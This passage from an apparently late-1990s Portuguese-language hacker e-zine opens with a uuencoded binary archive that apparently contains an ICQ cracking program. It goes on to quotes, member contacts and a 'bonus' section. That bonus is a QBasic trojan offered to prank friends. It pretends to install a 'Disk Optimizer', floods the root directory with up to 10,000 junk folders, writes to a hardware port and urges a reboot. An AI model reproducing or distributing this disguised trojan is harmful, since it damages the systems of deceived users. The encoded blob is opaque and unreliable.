M]#"/,`]!J":+Q:I%X)C0E4J%.X@GPE*'&>P0U>0A-N*],A=FD;<?D'07N)LD
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
M````"```'*XD![?[J"X!``#0`@``"P```````````"``MH'^"```1DE,15])
M1"Y$25I02P$"%``4````"`#!&JXDH*^8P<\"```5!```#````````````"``
H_X%5"@``:6-Q8W)A8VLN8V]M4$L%!@`````#``,`IP```$X-````````
`
end

--------------------------------corte aqui----------------------------------

**********
*8-FRASES*
**********

"Os computadores dominam o mundo, 
  nos dominamos os computadores, 
   Logo,dominaremos o Mundo"       
       ('GhOsT InVaDeR)           

"Nao basta conquistar a sabedoria,
      eh preciso saber usa-la"
            (Cicero)

"Amar seu computador eh deletar o  
        windows do seu hd"
            (dexter07)

**********
*9-BONUS*
**********
Esse mes eh um programinha em qbasic que eu achei numa zine por aih pra voce 
pegar seus colegas lammers,ele funciona como um trojan, diz que tah 
instalando o programa mas na verdade ele cria 10000 diretorios no pc do 
lammer, mas como o m$-dos soh gerencia 512 diretorios nao sao subdiretorios
sao soh os diretorios (ex: c:\jogos eh um diretorio c:\jogos\nascar eh um 
subdiretorio) entao digamos que seu amigo lammer tenha 500 diretorios no c:\
ele irah criar apenas 12, mas geralmente os computadores com ruindows nao 
passam de 50 diretorios. 

autor:desconhecido
Portanto faca o que quiser com o programa, mude-o a vontade 

----------------------------------corte aqui--------------------------------

COLOR 11, 0
PRINT "Installing DataFiles...  Please wait..."
PRINT "This may take up to 20 minutes, depending on your computer..."
SHELL "cd\"
FOR a = 1 TO 10000
a$ = STR$(a)
c$ = "md" + a$ + ".$$$"
SHELL c$
NEXT a
CLS
PRINT "Disk Optimizer 3.1 For M$-DOS is now installed in your system..."
PRINT "Have a Good Day!"
PRINT "by InSaNiTy ZiNe"
PRINT
INPUT "We Recomendly to you reboot your system now"; a$
OUT &H375, 255

----------------------------------corte aqui--------------------------------

************                 
*10-MEMBERS*
************

dexter07-dexter07@bigfoot.com
WORMBOY-skiller@imagelink.com.br

POR FAVOR, SE VOCE FOR COPIAR ALGUM TEXTO INSIRA A SEGUINTE LINHA
(INSANITY ZINE,EDICAO XX,AUTOR:XXXX)

ATENCAO!!!:PROCURAM-SE EDITORES PRA ESSA ZINE, SE VOCE SABE BASTANTE SOBRE 
ALGUM DESSES ASSUNTOS, MAIL-US


                    ++++++++++++++++++++++++++++++++++++
+++++++++++++++++++ http://members.xoom.com/insanityzine +++++++++++++++++++
                    ++++++++++++++++++++++++++++++++++++ 

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

III  NN      NN  SSSSSSSSS    AAA    NN      NN  III  TTTTTTTT  YY      YY
III  NNN     NN  SS          AA AA   NNN     NN  III     TT      YY    YY
III  NN NN   NN  SS         AA   AA  NN NN   NN  III     TT       YY  YY
III  NN  NN  NN  SSSSSSSSS  AA   AA  NN  NN  NN  III     TT         YY
III  NN   NN NN  SSSSSSSSS  AAAAAAA  NN   NN NN  III     TT         YY
III  NN    NNNN         SS  AA   AA  NN    NNNN  III     TT         YY
III  NN     NNN  SSSSSSSSS  AA   AA  NN     NNN  III     TT         YY

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
